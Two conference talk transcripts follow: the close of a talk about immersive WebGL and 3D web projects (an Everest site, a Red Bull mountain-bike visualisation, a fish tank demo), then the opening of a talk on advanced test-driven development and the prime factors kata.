graphics. And finally with WebGL, 3D graphics are becoming more pervasive on the web. And so it's a really exciting time to be a developer because we're sort of seeing that same explosion in growth that we saw early on in computer history where things just rapidly got so amazing. We're seeing the same sort of thing happen on the web today. Yeah. In fact, it's kind of an interesting time to be a web developer because things are changing so rapidly that I kind of feel like we've got the same problem that Apple has where like for a while everything was so brand new, everything that you do was so brand new that people just got excited that now that the technology, I guess, at least from a visual perspective is settling down. People's expectations have already been set so high we don't know quite where to go. Although it's been, so I guess that when we think about extreme web browsing, one of the things that we've noticed is that if we actually take extreme content that that sometimes brings some of the same excitement. So this last year we had an opportunity to work with a company called Glacierworks. Glacierworks was started by this guy, this man named David Brashears, and David is as extreme an individual as you will meet. He has made a career out of climbing Mount Everest and taking just really stunning photos. So he's kind of a hybrid and he's an adventurer, he's a climber, but he's also a multimedia guy. In fact, I think that he was responsible for the first television broadcast from the top of Mount Everest. He's submitted, I think, eight times. Is that right? I think he's submitted, he climbed Mount Everest, I think, eight times and reached the summit five times. Okay, so he's submitted five times, climbed Everest eight times, and he's been on the mountain dozens of times. So one of the things that he's done recently is he's made it his mission to capture imagery related to climate change on Mount Everest. And it's interesting because if you go back and you look at some of the original photos that Hillary and some of the other early expeditions took, you can see certain levels of snowpack and you can see where the ice levels are. So he's gone back and he's taken new versions of those photos from exactly the same point at the same time of year and in the same light, and then he allows you to compare them side by side and you can see the dramatic reduction in ice. So we had a chance to help him bring some of the content that he created to life and this is a little promo video about that. Yeah, so this is David sort of explaining the mission of Glacier Works and what they wanted to do. I've got, like, first play is always a little tricky. In 1983 I had climbed Everest for the first time and I was walking out for base camp and there was Seredman Hillary. This huge figure, this hero of mine, I sat down and started talking. I was talking so much about the climb and reaching the summit and he very kindly said to me after maybe an hour, David, someday you'll learn to turn your eyes from the summit and look into the valleys. It took me about 20 years to understand what that very special man had said to me. Now I've set out on a journey to understand this place I care about, this place really where I grew up. This glacier and 35,000 other glaciers like this supply water to about 2.3 billion people and it all starts up here. But after years of photographic research, I wanted to know more about the change I was witnessing. We now have powerful new imaging tools available. Adapting these tools has enabled us to document the upper reaches of the highest and most inaccessible mountains in the world. This is where the glaciers are born. We can also depict with tremendous clarity even the highest slopes of Mount Everest. This is our planet and you do not have to be a mountaineer to be able to gaze at the Himalaya and just feel awestruck. I invite you to join me on a journey of exploration in the hope that you will come to understand this region and to care about these mountains and glaciers as much as I do. So talking with David was a really fun experience for us because it felt like we could take a little bit of a trip to Mount Everest. And David wanted the experience on the site to be very similar to that where people could feel like they go to the site and actually experience Everest. So we did a few things to make that possible. One of the interesting things about Everest is that oftentimes you think about summiting Everest, you are thinking about getting to the top of the mountain. And David told us that it was not actually like that at all. Summiting the Everest is sort of a one-day trip like you make it up the mountain and then you try and come back down and hopefully everything goes okay. But there is actually a much longer process to lead up to that point. And along the journey to Mount Everest you have to stop in a series of villages. So part of the site we wanted to do a, maybe you could pull up, Everest. We wanted to do a trek that would take people from the first village which is Lukla and through the series of villages. And each of these villages has interactive content that gives the user a feeling that they have been on that same journey. And it is not like you would actually take one journey through all of these cities. He said oftentimes what they would do is they would go to one of these little cities and then they would go to the next and then go back. And it was part of a process that they had to go through to get acclimatized to the altitude so that they would be able to withstand that once they actually summited the mountain. So the trek is using CSS3D. This was sort of right before Internet Explorer introduced WebGL. So it's still pretty interactive. You can see that you can rotate the map around. If we go inside one of the cities you can see that we're combining gigapixel imagery that was turned into panoramas where you can zoom in. We also wanted to combine it with storytelling. We didn't want to just drop users off into this panoramic view and have them feel like they don't know where to go. So the idea was to work with a technology that Microsoft Research had created called rich interactive narratives. And the idea is that you can guide users with audio. So if we click the play button it will start giving the audio tour. It will manipulate the panoramic image and sort of guide users through the different villages. But at any point users can stop the tour. They can choose a different area of the panorama. They can zoom in and explore and there's lots of content. So it's sort of finding a balance between sort of a video approach where David's a filmmaker. He's worked on IMAX Everest and other films where you have a set story that you tell users. And the web which provides lots of interactivity. We tried to find a balance between those two competing interests. Everest Base Camp is pretty fun because you can see all of the tents. So if we zoom in really, really close down there you can see like some guys setting up some tents down there. And the image will load up. So that's, it's kind of interesting to see. So you know these are the tents where people are staying at base camp and it's, it gives you some perspective to see how tiny those are relative to you know this massive landscape. It's pretty, are there any mountaineers here? What? We're in Norway guys. What's going on? So about halfway through this project actually we shipped the initial version of Glacier Works of the Everest experience. I introduced WebGL and they thought wouldn't it be neat to try and use the 3D capabilities of the browser to give a more realistic, rich representation of the mountain. So we did that. So if you look at the track it's sort of 2D. It's still rotated in 3D. Give it a little bit of feeling like you're going through the map. But if you compare that to the 3D version there's a pretty big difference. And so there are lots, there are some scenarios like this where 3D really fits well. It's a 3D mountain. It's real. You feel like you can get in there and experience it. You get a sense for what the peaks actually look like, the terrain looks like, that you wouldn't get from a two-dimensional map. So this is an example of a perfect use for 3D. So one final thing that we wanted to quickly show you. If you saw during the intro video they had a helicopter that they flew up into the mountain area and they had attached all of these cameras to the front of it. And it was really interesting. David told us that during the entire helicopter trip the pilot was really hesitant to get higher and closer to the mountain. And David kept on pushing me. He said, get a little bit closer. A little bit closer. And so the pilot was really hesitant. He just didn't want to do it. But they went as far as they could and as close as they could to the mountain. But because they had all of these high resolution cameras on the front of the helicopter they took all that imagery and used computation to sort of merge it into a 3D mesh. And so you saw part of that video at the end and I'll show you a little bit now where they've constructed a flight that is actually rendered in 3D. And this is pretty amazing because in the same way that the helicopter could not actually go much further or much closer to the mountain, the 3D model allows you to make any path you want through the mountain. And so some of these paths, David as a filmmaker, wanted to do these cinematic curves where we would get really close to the mountain or fly into these valleys where it's physically not possible because the helicopter would probably crash if it did. So the way they created it is really interesting. They took literally thousands of photos. They take hundreds of photos every minute. Or actually thousands of photos every minute. They had like these nine cameras mounted. And then they had technology that would compare similarities in the photographs and then use those to triangulate essentially where specific points were in the photos. And then from there they could construct a point cloud and then they could use the point cloud to construct a 3D mesh. And then from that they mapped the original photography back onto that mesh. And so this video that they're creating is actually made up of the imagery that they captured as they moved through the mountain. But they have complete control over the actual camera movement, which was important because as Joel was mentioning, when you get up that high there's so little air that it's difficult for the helicopter to first of all be steady. And like Joel mentioned, they actually went up higher than I think they're even allowed to by law because it's so dangerous. But also the helicopter just isn't smooth. So this gives them the ability to create smooth, beautiful transitions through the mountain. Yeah, the first one. Okay. So another sort of extreme project that we did this year was a project for Red Bull. And so Red Bull has an event that they sponsor every year, again in Utah, which is like I mentioned where I'm from. So this event is called the Red Bull Rampage and it is some of the most extreme bicycle riding that you will literally ever see. It's crazy. In fact, we should watch the video and then we'll tell you more about it. See if I can get rid of that first view problem. Okay, so this year's sport has its proving ground. For us, that proving ground has been Utah. Everyone's terrified, I think, when they're heading to the top. This practice is pretty on for giving. The Red Bull Rampage is the scariest event of the year. So Rampage was started in the early 2000s and they did it for a couple of years and then they found that the riders were pushing themselves so hard and it was such extreme terrain that they became worried about the safety of the riders so they actually shut down the event for several years. And then just recently, a couple of years ago, they started it back up and from what we could tell nothing changed. So maybe there's just a lot of demand for extreme riding. We actually won a Webby for this. So we just won a Webby this year and somebody from Red Bull accepted it so we didn't get to make our one minute acceptance speech. We were really proud of the team that helped to produce this. So with this one in particular, you can see that there's another 3D model of a mountain. We actually learned how to do that with Everest. We learned how to take the geological data and turn that into a 3D representation of the mountain. And it turns out that's not a trivial thing to do. There's a fair amount of work in sort of moving between sort of the geo-coordinate space and the 3D coordinate space. So Red Bull had seen that and they were, because ironically they actually launched an Everest app around the same time that we did. So they launched theirs, we launched ours, and we were actually kind of mad because they had a better marketing team behind theirs. But they saw ours and they were excited about it. So they had this idea that they could use it for Red Bull. And the reason is that Red Bull is what they call freestyle mountain bike riding. And the idea is that the course that you take through the mountain is a part of your score. So it's kind of like gymnastics or something where you actually get scored not just based on your time but also based on the difficulty of what you try to do and sort of the creativity of what you do. And so for enthusiasts of a sport like that, it's important to not just see the ride itself but actually see how the ride takes place on top of the mountain. And they were really interested in a way to represent that on the web. So they had this idea, well maybe we could take GPS data from the riders and combine that with geological data and give people a 3D view over how the riders decide to attack this mountain. So one of the first things that we had to figure out though was where we get the 3D data for this really kind of unique and small area in the desert of southern Utah. And it was funny because it just so happens that one of my best friends growing up was the city planner for the town where this event happened. And so he was able to slide us under the table a little bit of geological data for this. So then from that we constructed this mountain and then we put GPS devices on the riders. Some of them didn't want to do it. There were I think two guys that actually wouldn't do it. In retrospect we wish we would have put about five devices on each of the riders because we didn't get quite enough data. So you can see that the data points that we get for the riders are relatively sparse. But you only get one chance with these guys. They're not going to do the ride again. Sometimes they'd drop off a cliff and you'd see the data point where it would be like this far apart on the mountain. A lot happened in that one second. In fact we did some work to kind of interpolate the data so that we had like a nicer sort of representation of it. But so this series of dots represents where the riders moved on the mountain. And then you can see we've kind of added sort of these markers where something interesting happened. Like a crash or a jump or something exciting. Each of the riders goes the week before the event and they will construct their own line and that's part of the criteria that they're judged on. So it's pretty fun. They have videos of guys out there. They've got their family members and friends out there. They're actually constructing their line. So that was one of the goals. As you can see when we switch between users the different lines that each mountain bike rider chose. This guy is our favorite. Yep. And we should watch his run. Let's watch it. This guy it's seriously insane. Spice on the ridge line. So keep your eyes peeled as he's making his way over towards the canyon gap. A lot of people talk about how Kelly's hair flows but he is one of the largest riders we have on the scene. Makes it almost look like he's riding a BMX when he comes down. So right over that ridge line trying to make his way into his line backside of this line. Nice to be able to get a good camera angle of that as we come down. It's flying through here. Skipping over top of it at the land sections. Oh! Cork hip flip over top of that little left hand. Ridge line hip. Bombing down keeping a lot of flow as he's coming up into this drop. Getting it nice and smooth and up into this next part where he'll just be linking up to one last drop. Clean on the drop. No! Huge backflip! Oh my gosh! He let it a backflip over the 72 foot road gap. He just has to finish this run an unbelievable 72 foot plus backflip. And a huge backflip on that right hand step down. He needs to hold on. Going a slight bit offline and finishing off with a nominal run. Kelly Deary. So that jump is like 23 meters. It's huge and it's about that far down too. They had actually increased the canyon gap from previous years and some of the riders were a little hesitant to even try it. So the fact that he went over it and did a backflip everyone was just going crazy. They could not believe it. It was really unbelievable. So after the event, well some of the riders including Kelly had actually been equipped with GoPro cameras. So one of the really amazing things, you may have seen this because this actually got a fair amount of attention on YouTube. One of the things you can do is actually watch this from his perspective. And that is crazy here. Should we watch it? Yep. So this is the same run, the GoPro version. This thing is so crazy. That's sort of the first little mini backflip. I get so nervous. Dude! This is crazy. So I was actually going to do this, but now with GoPro videos on the web, I don't need to. Okay, so how are we doing on time? So the last project that we want to tell you about, and this one is just kind of for fun, is a project called FISHGL. This is a project that we just did. The Internet Explorer team, who actually sponsored a lot of these projects, they have this really great program where they realized that they could divert some of their marketing dollars toward just helping people bring really cool stuff to the web, rather than buying ads or whatever. And so they just recently shipped support for WebGL in the most recent version of their browser. And they have, with every sort of significant sort of graphics release in the browser, they have created a FISHTANK demo, and that's kind of a fun thing that they do internally. So they actually asked us to do their FISHTANK demo for WebGL. And there's kind of two, well I guess maybe the most remarkable, two remarkable things about what's going on with this. So WebGL, as you know, gives you the ability to put 3D in the browser. And we're, you know, I guess kind of when you look at the big picture, sort of where we've been and where we're going, it's interesting to see that, you know, we started off talking about some of the first 3D video that was created in 1972. You remember I mentioned it took two and a half minutes to render one frame on what would be probably $2 million hardware in today's dollars. And today we just created a FISHTANK where we're rendering much, much more, I mean it's not super complex 3D, but it's significantly more complex 3D than the hand video was. And we're doing that at 60 frames per second on a multitude of devices, including your phone. And finally Apple just announced this week support for WebGL in iOS. So I think that means that now there's WebGL support not just in every browser, but every major browser, but also on every major device including handheld. So essentially, you know, all of the major web browsers that you might come into contact with now have the ability, including the one in your pocket, to render at 30 to 60 frames per second the same type of 3D that just 30 years ago took two and a half minutes per frame and $2 million. Now I know that it's fun and it's exciting to kind of congratulate our industry on how quickly things are moving, but it really is amazing when you think about that, to think at how quickly things have changed. And it kind of gives us perspective on how quickly things will be changing. If you want to see this one really quickly we can show you the, this one turned out to be really cute. Not nearly as exciting as watching people jump over 70 foot cliffs, but 23 meter cliffs, sorry guys. You guys probably know more about feet than I know about meters though. See. So this is just a cute tank, or fish tank, but it is kind of fun to see what you can do inside of a browser today. That's Internet Explorer Island back there. So let's manipulate it, rotate around the 3D. So that's the fish tank. We kind of did it as a performance demo I guess so you can add a bunch of fish. Oh look, there's, they're placed randomly and looks like we've, he's a little confused. He's got some issues. We should reduce the number of fish and see if we can help him out. We'll give him a merciful death. Put him out of his misery. One of my favorite features in this one is you can actually adjust the amount of time since the last cleaning. So we wanted to do something to change the graphics a little bit and that was a suggestion that came to us. So anyway. So this one was kind of fun. We did do a mobile specific version just because many of the mobile devices even though they support WebGL have limited memory so we couldn't load the full models and all the textures. The textures are actually pretty big in the full version. So we did sort of a scale back version for mobile and it was pretty incredible to see it. They demoed it at the build conference about a month ago and they had a great phone and it was running 60 frames a second. It was just unbelievable to see sort of a model running in 3D on the phone at 60 frames a second. Incidentally, it's interesting. I have a first version surface tablet which also runs both the desktop and the mobile experience. The phone which was about a year, maybe a year and a half newer actually got a higher frame rate than the surface. And that just tells you how quickly the graphics chips are getting better that a phone is doing better than a tablet even a couple years ago. So it's getting pretty great. All right. So, yes, so the future, I guess the question is what happens now, right? And we get asked this question all the time, like sort of where do we see things going? It's been a really exciting time to be a Web developer and I don't think that's ending by any means. I think that the Web, how many people here are Web developers? A lot of us? Okay. So I think that the Web is, the thing that we get excited about the Web is first of all that it's very, very collaborative. And because it's so collaborative, we kind of benefit from the innovation of an entire industry. For a long time that meant that it moved slowly but that doesn't seem to be the case anymore. We kind of feel like now we are able to sort of capture the collective innovation of the group, so to speak, of the industry, but do so very, very, very quickly. And that's the thing that we feel most excited about is kind of the bet that we can take on collaboration and the bet that we can take on the innovation of the group. I don't, in spite of the title of our talk today, we don't exactly know what the future of extreme Web browsing is, but we are very invested in it and very excited about it. And when we take the broader look, look at where we've been and where we're going, I think we have a big reason to expect great things out of this technology that we all love so much. Thank you so much, you guys. If you guys have a minute, we'd love to get your feedback on the way out and if there's any questions, we'll take those too. Any questions? Yeah. Which URL page? Yeah. Which one? The... Oh, the slide. All the URLs? How we should do that? We can post them. Yeah. I'll tell you what, my blog is nerdplusart.com. Nerdplusart.com. Here, I'll type it in so you guys can see it. And I will post... That's something I should do anyway, is I will post all of these up there. Let's see. Great idea. So that was not just a question, but a suggestion and I will follow up on that. Any other questions? So that's it right there. Nerd plus art or... There it is. Nerd plus art. Yeah, any other questions? Thanks guys. All right, member feedback. Thank you so much guys. It was really fun to spend an hour with you this morning. Thanks.
|
Only a handful of people will get to climb Mt. Everest during their lifetime and even fewer will land backflips over 25 meter canyons on a mountain bike. In fact, you probably shouldn't try that. And yet, growing support for WebGL and other immersive web technologies bring more of us closer to that reality than we've ever been before. In this talk, we’ll explore the future of interactive story telling and what it means to some of the worlds most passionate explorers. We'll show you how these pioneers are using emerging technologies to bring some of the world's most extreme moments into the living rooms of fans and enthusiasts. Come see how 3D, audio, video, gigapixel photography and compelling new hardware combine to create a brand new kind of narrative.
|
10.5446/50859 (DOI)
|
Hello, hello, hello. I'm going to keep my voice down. Can you hear me all the way up there? Everybody okay up there? Yes, I can see you barely because the light is in my eyes. Good. I'm going to see if I can keep my voice low so that I don't strain it. Imagine that my outstretched arms represent the age of the earth from its formation four and a half billion years ago until now. Where are the dinosaurs? Right there. In my first and second knuckle at the very tip of my long middle finger, that's where the dinosaurs were born, that's where the dinosaurs were destroyed. The dinosaurs are very, very recent. We don't like to think about it that way. We think of the dinosaurs as being ancient, but they were only destroyed 65 million years ago out of an age of four and a half billion years. Here, right where my wrist is, is when life crawled out of the ocean. The history of life on the surface of the planet is only as long as my hand. But where on this scale did life begin in the ocean? The answer to that is here. Over three and a half billion years ago, there was life on this planet. Microscopic life, bacterial life, but life. And we know this because we measure the ages of the rocks using radioactive decay. And we see tiny fossils of bacteria here. And we see the rock structures, the stromatolites that they created. And most important, we see the rust. Because those ancient life forms were autotrophic. They turned sunlight into energy. And they released oxygen. And that oxygen combined with the iron in the sea to create rust. And all during this time, all the way to here, that rusting was occurring. It was only here that finally all the iron in the ocean was consumed by the oxygen. And now oxygen could build up in the atmosphere. Prior to this, there was no free oxygen anywhere in the atmosphere. But this is not what we're supposed to be talking about. I just find it fun. How many of you watch my videos? Lots of you. And you notice that I begin all my videos with a science lecture. I do this because it's fun. I also do it because it's something of a trademark. 20 years ago, 25 years ago, I taught a number of courses in C++. And I would break every hour. And at the end of the hour, I would get everybody to come back in the room. And I noticed that they were all talking to each other. And I could not begin my lecture. And I would try to hush everybody, but they would continue talking. So I stumbled on the idea of lecturing about something interesting, but not part of the curriculum. And I found that people almost immediately stopped talking because they wanted to hear it. So I've been using that technique ever since. Now it's become a trademark, so I do it no matter what. The name of today's talk is Advanced Test Driven Development, the Transformation Priority Premise. For the next hour, I'm going to talk to you about test-driven development and some advanced concepts in this idea. How many of you are test-driven developers? Look at that. Now, of course, it's a self-selecting crowd, but I'd say that was 80% of you. If I'd asked that question five years ago, it would have been a third of you. If I'd asked that question five years ago or seven or eight years ago, it would have been a small smattering of you. Now we have 80%. Now you're attending a course or a talk on advanced test-driven development, so I assume you were attracted to it. Because of that, still, the ratio is impressive. What does it mean? It means that the discipline is gaining ground. This controversial discipline introduced to us 14 years ago by Kent Beck has slowly been gaining ground, like a rolling snowball. Wherever I go, more and more people are claiming, at least, to be doing test-driven development. I'm going to test that claim, by the way, by defining it for you. Procedure-driven development is composed of three laws. The first law is that you are not allowed, by the discipline, to write any production code until you have first written a failing unit test. You cannot write any production code. You have to first write a unit test that fails. Once it fails, then you can write production code. And oh, by the way, not compiling is failing. The second law is you are not allowed to write more of a unit test than is sufficient to fail. As soon as the unit test fails, or fails to compile, you must stop writing it and start writing production code. The third law is the worst of them all. The third law says you are not allowed to write more production code than is sufficient to pass the currently failing test. If you follow these three laws, you will find yourself trapped into a cycle that is 10 seconds long. You write a tiny bit of unit test code, but it won't compile, because the functions you're calling have not yet been written. So you must stop writing the unit test and start writing production code. But you will add just the barest amount of production code, and that will make the unit test compile. You must stop writing a production code and go back to the unit test. You will add a little bit more unit test code until it fails. You will add a little bit more production code until that test passes, and you will oscillate back and forth between these two streams of code on a second-by-second basis. Ten seconds around the turn, maybe 20, maybe 30. How many of you are doing test driven development? That's a significantly reduced number. That's the discipline. Now, disciplines. Disciplines are arbitrary. We choose them because we made some decision. So for example, how does a doctor scrub before surgery? In the United States, at least in some hospitals, they teach their doctors to get a brush, soap up the brush, and then do 10 strokes across the side of the finger, test 10 strokes across the top of the finger, 10 strokes on the other side of the finger, 10 strokes across the face of the finger, 10 strokes across the nail, next finger. That's a discipline. It's an arbitrary discipline. Is 10 strokes the right number? Do you have to do the four quadrants? Could you do three quadrants? It's not relevant. It's just a discipline. It's arbitrary. And yet, the doctors teach each other this discipline, and they follow it, and they watch each other in the scrub room. They watch to make sure that they're following the discipline as it was taught to them. How many of you are pilots? Anybody here learn to fly? One of you. Maybe more. I don't know. When you learn to fly, you learn disciplines. One of the most important disciplines is the checklist. Before you do anything, you pull out the checklist, and you make sure that you follow the checklist items. You first get to the airplane. You get the checklist out, and the checklist says, walk around the airplane. Look at the different parts of the airplane. Make sure the airplane is fine. It's a discipline. And you learn this discipline, and your instructor says, start here. Walk around this way. Walk that way. Around the plane. Look at this. Look at that. It's all on the checklist. And he observes. You do it. He watches you. He's decided that you've learned the discipline. He puts a signature in your log, saying that you are now allowed to do this unsupervised. Those are disciplines. Disciplines invented by professions. Professions that decided they needed disciplines. Does our profession need discipline? Some day, maybe it's already happened, something terrible is going to happen. I don't know when this will happen, but it will. Some poor software guy is going to do some stupid thing. And tens of thousands of people will die. Is this possible? It's absolutely possible. How much software is running around you at the moment? And not in your iPhones, and not in your smartphones, and not in your laptops. How much software is running in the walls of this building? Software that you depend upon for your life. Is there software running in the smoke detectors? Is there software running in the fire alarms? Is there software that controls the opening and locking of the doors? Are there elevators around here? Is there software that controls the elevators? Go out on the road. How much code runs in every car out there? Would you be surprised to find out there's 100 million lines of code in a modern car? A hundred million lines of code in a modern car? That should scare the hell out of you. Because you know what that code is. Most of the world does not. If they did, they would ban the cars. And you know this. Someday something horrible will happen. Tens of thousands of people will die because of a software error. And the politicians of the world will rise up in righteous indignation as they must. And they will point their fingers squarely at us. And they will ask us the question, how could you have let this happen? And our answer must be a good one. Because if we answer by saying, well, my boss made me do it. Or we had to get to market on time. Or I just didn't feel like following any disciplines. If that was our answer, then the politicians of the world will do the only thing that they can do. The only thing they're good at, and even that's questionable. They will legislate. They will pass laws. They will regulate us. They will tell us what languages we can use, what practices we must follow, what books we must read, what tests we must pass, what computers we can operate on. And we will all become civil servants. Don't underestimate this. Our society now depends for its life on us. Software is everywhere. We are the only ones who know what that software is really like. Eventually the rest of the world will find out. They almost found out with the American healthcare system, healthcare.gov, which turned into an incredible disaster, a software disaster of nearly catastrophic measure. Here was a law passed through both houses of the United States Congress, signed into law by the President of the United States, and they could not get the software to execute. It was a terrible disaster. As a result of that, the United States government is now contemplating a new cabinet position reporting directly to the President, the CTO of the United States of America. What would this guy do? Thinking about that scares the hell out of me. Why TDD? I went through the three laws. Now let's talk about what those laws by you. If we adopt a discipline like this, just because we think we ought to be disciplined, then we're stuck in this funny little loop, this 20-second loop. What does that loop buy us? Well, if you're in this 20-second loop or this 10-second loop, it means that 10 seconds ago, everything worked. Everything you were working on. You executed, passed all its tests. What would your life be like if 10 seconds ago, or a minute ago, or five minutes ago, everything worked? And I mean, everything worked. How much debugging would you do? The answer to that is, well, you're not going to do a lot of debugging. How many of you are good at the debugger? I mean, you know the debugger. The debugger is your tool. You know how to set breakpoints and watchpoints. You've got all the hotkeys down. I mean, you know how to watch the variables change and get to this breakpoint three times and get to that breakpoint seven times so you can debug. This is not a skill to be desired. You don't want to be good at the debugger. The only way you get good at the debugger is to spend a lot of time debugging. I don't want you spending a lot of time debugging. I want your time to be spent making tests pass. I want your time to be spent writing code that doesn't need to be debugged. Now, you're still going to debug. It is still software. It's still hard. But the amount of time you will spend in the debugger becomes very small. So small that you lose the control that you had. Your fingers don't remember the hotkeys anymore. The debugger becomes a foreign tool. You can still use it. But you don't use it enough. And that's a good thing. But never mind that. What else? How many of you have integrated a third-party package? You buy some third-party package from some source. You get some zip file. You unzip it. In there, there's DLLs. There's maybe some source code. Inevitably, there will be a PDF. That PDF is a manual. That manual is written by some tech writer. And at the back of that manual, there's an ugly appendix with all the code examples. Where's the first place you go? Your programmers. You don't want to read what the tech writer wrote. You go to the code examples first. You look at the code examples. The code examples will tell you the truth. If you're lucky, you can copy and paste those code examples into your application and fiddle them into working. What you are writing when you write unit tests in this tiny little cycle are the code examples for the whole system. You want to know how some part of the system works? There is a test that tells you how that part of the system works. You want to know how to call some API function? There's a test, probably several tests, that tell you every way that you can call that API. You want to know how to create some object? There is a test, a suite of tests, that creates that object every way it can be created. And these tests are little documents. Little documents that describe how to use the system at its most detailed level. And these documents are written in a language you understand. They are utterly unambiguous. They cannot get out of sync with the application. They are so formal that they execute. They are the perfect kind of document. But never mind that. How many of you have written unit tests after writing the code? Ah, now these are all the people who said they were doing test driven development. It seems logical to us to write the code first and write the code second. But if you do it that way, then you will inevitably come across as you are writing tests. By the way, how much fun is that? It's not fun. Why isn't it fun? Because you already know the code works. You've tested it manually. You went through it all. You wrote it all. You brought it up on a screen. You did it. It works fine. Ah, now I've got to write unit tests. Why do I have to write unit tests? Because some process guys said I have to write unit tests. So you write them, but you write them begrudgingly. You're not happy about it. They're not fun anymore. And you write this one and you write that one and whatever. Write this one. Okay, fine. Yeah, I think I got most of it done, whatever, and you're done. Or, and this happens frequently enough, you come across the function that is hard to test. The function that you look at it and think, oh, wait a minute, if I try to test that, it'll erase every row in the database. Man, I don't think I'm going to test that when I saw it work when I tested it manually. I'll just let that one go. And you leave a hole in your test suite. If you write your test first, that can't happen. If you write your test first, you must design the code, the production code, to be testable. There will be no function that's hard to test because you can't write the function that's hard to test. You write the test first. And a testable function is testable because it's decoupled. So the only way to write testable code is to decouple it. The act of writing the test first forces you to decouple things that you hadn't thought you ought to decouple. You hadn't even thought about decoupling. You wind up with a much less coupled design when you write your test first. You also wind up, more importantly, with a test suite that covers everything. Anybody out there have a coverage number? A goal for coverage that you're trying to hit? What's your coverage goal? 100%. Is that realistic? Hell no. No one can get a 100% coverage. But that's the only meaningful goal. If your goal is 80%, then what you are saying is that it's okay if 20% of the code doesn't work. Your goal has to be 100%. Even though you cannot hit this goal. It's an asymptotic goal. It's like losing weight. You never get to your target weight. But you keep on trying to lose. What happens when you have a test suite that tests almost everything? A test suite that runs quickly, maybe in a minute, two minutes, three minutes, and it tests almost everything. It tests so much that if it passes, you are willing to deploy. That's the goal, by the way. The goal is to get the test suite to pass, and if the test suite passes, you deploy. No other QA, no other stuff after the fact, no manual testing after that. If the test suite passes, you deploy. If you had that, what could you do with it? How many of you have been slowed down by bad code? Okay, if you look around, you see that's unanimous. Why did we write it? If we know it slows us down, why would we write it? Well, there's all kinds of reasons why you'd write it. The real reason why we write bad code is because we always write bad code. It's hard to write good code. It's especially hard to write good code when we're trying to make it work. There's this problem. We've got to get something to work. All of our focus is on getting this code to work. You're writing this code, you're writing this code, and you're testing it manually, and you're writing it, you're testing it manually, and you're not working, and you write the code, and all of a sudden it works, and you back away very carefully, and you check it in, and you walk away. And of course, the code's a mess, but once you've gotten it working, you don't want to touch it. How many of you have brought code up on your screen, and your first reaction to that code is, huh, this is a mess, I should clean it, and your next reaction is, no, I'm not touching it. Because you know if you touch it, you will break it, and if you break it, it will become yours. So you walk away, you leave the code in a mess, you react in fear, fear of the code, fear of a change to the code. I submit to you that if you fear changing the code, the only thing that can happen to your code is that it will rot, because you will never do anything that improves it. You will only do things that make it worse, and worse, and worse, and worse, and you will continue to slow down, and slow down, and slow down until you are at a virtual stand still. Some of you may be in that position now, possibly a majority of you, maybe at that virtual stand still where estimates have grown to months that used to be weeks. Why? Because you're afraid of what happens to the code. If you had a suite of tests that you believed in that ran quickly, then that code can come up on your screen and you think, oh, I should clean that, and your next thought is, hmm, I think I'll change the name of that variable, run the tests. Oh, that didn't break anything, huh? I think I'll take that function and split it into two functions, run the tests. Oh, that didn't break anything. Huh, well, maybe I'll take that class that's a little too large, I'll split it into two classes, run the tests. Oh, that didn't break anything. If you have the suite of tests, you eliminate the fear. If you eliminate the fear, you can clean. If you can clean, you can go fast. But you need a suite of tests that you trust with your life. You need a suite of tests that is so bulletproof that you can deploy based on it. And the only way I know of to get a suite of tests that good is to write the test first, to follow the discipline. As absurd as the discipline may sound. That discipline does guarantee you a suite of tests that covers just about everything. I'd like you to consider how incredibly irresponsible and unprofessional it is to be afraid of the code you have created, to react in fear of changing this thing that you made. What do we call this stuff that we make? We call it software. And the first word there is soft. Why is that first word soft? Because we expect it to be easy to change. If we had wanted it to be hard to change, we would have called it hardware. We don't. We invented software so that we could easily change the behavior of machines. At this, our industry has failed. We make it hard to change the software. We become afraid of the software. This is an incredible failure of our industry, and it must be fixed. We are not the only industry to have faced this problem. Other industries have had the same issue. One of those industries is accounting. Even the poor accountants, how much like software is accounting? If you were to give me a thumb drive, that's a nail file. It is remarkable that I cannot tell the difference between 8 gigabytes and a nail file. 8 gigabytes. Give this to me. Put your application on it. Maybe your application is 200 megabytes. That's what? 1,600 million bits. I can find one bit in that 1,600 million. I can find one bit. Flip one bit and make your application unusable. Your application is sensitive to failure at the bit level. There are individual bits that will destroy your application. That is not true, I hope, of this theater. There's no single pulley that if it fails will have me crashing to the floor. I hope. There's no single cable which if it fails will have me crashing to the floor. I hope. We could go out on the road and take bolts out of bridges. They wouldn't fall down right away because as humans we don't like single points of failure. But software is loaded with single points of failure. There's probably thousands of bits in here which if I flip them will completely corrupt the application. What other industry had that problem? Accountants did. Accountants had that problem. A single digit on just the right spreadsheet at just the right time can completely corrupt the status of the books cause the company to go under bankruptcy, send all the executives to jail. We've seen it happen. How did accountants deal with that? They invented a discipline 500 years ago. The name of that discipline is double entry bookkeeping. Every transaction gets entered two times. Once on the liability side, once on the asset side. Then they follow separate sums until there is a subtraction on the balance sheet that must yield a zero. The accountants in the old days would enter a single transaction on the liability side, the same transaction on the asset side. They would do the sums. They'd do the subtraction on the balance sheet. They'd get a zero. They knew they hadn't made an error. Then they would do the next transaction. They did not do all the assets first, all the liability second, do the sums, do the subtraction, and get a 37. I wonder which one of those was wrong. Test driven development is double entry bookkeeping. It is exactly the same discipline. It's done for precisely the same reason. Everything is said twice. Once on the production code side, once on the test side, they follow complementary execution pathways to wind up at a Boolean result, pass or fail. Did we do them one transaction at a time? One little bit in the test side, one little bit on the production code side, run them, they pass. Now if you were so upset about having to write the test first, I would not complain bitterly if you wrote the code first and the test second so long as you followed the same cycle. As soon as the code doesn't compile, you make it compile by writing just enough unit test to make it compile. As soon as the code does something that the test don't cover, you write just enough of the test to make it cover. As long as your oscillation between the two streams is 10 seconds long, I don't really care which one comes first. The problem with people who write their unit test after is not that they're writing unit test after. It's that they wait a long time before they write the unit test. Now if you've adopted this discipline, the first thing you face is just the unfamiliarity with it. It's difficult, it's odd. You've got to figure out some way to write a test, but it's hard to do that until you learn about things like test doubles and mocking and some of the other interesting techniques that come along. And as you learn those things, it gets easier. After a few weeks, it can become pretty easy knowledge. So what are the deeper implications? What once you become familiar with test-driven development, what are the deeper rules? Let me show you some of them. You can see this, right? A little bit of Java code. I am going to do for you the good old prime factors cata. The prime factors cata is an exercise in test-driven development that test-driven developers do as a practice, a warm-up. Something you do in the morning just to get ready, do the prime factors cata, good, now I'm done, now I can actually get to work. Just like a warm-up exercise. The goal of this is to compute the prime factors of a given integer. The origin of this cata comes from my son who was in sixth grade, this would have been about 2005. He came home from school with this homework, calculate the prime factors of a bunch of integers. And I said to him, well son, I'm glad to help you with this, go to your bedroom, do the best you can, by the time you're done I will have written you a program that will allow you to check your work. It 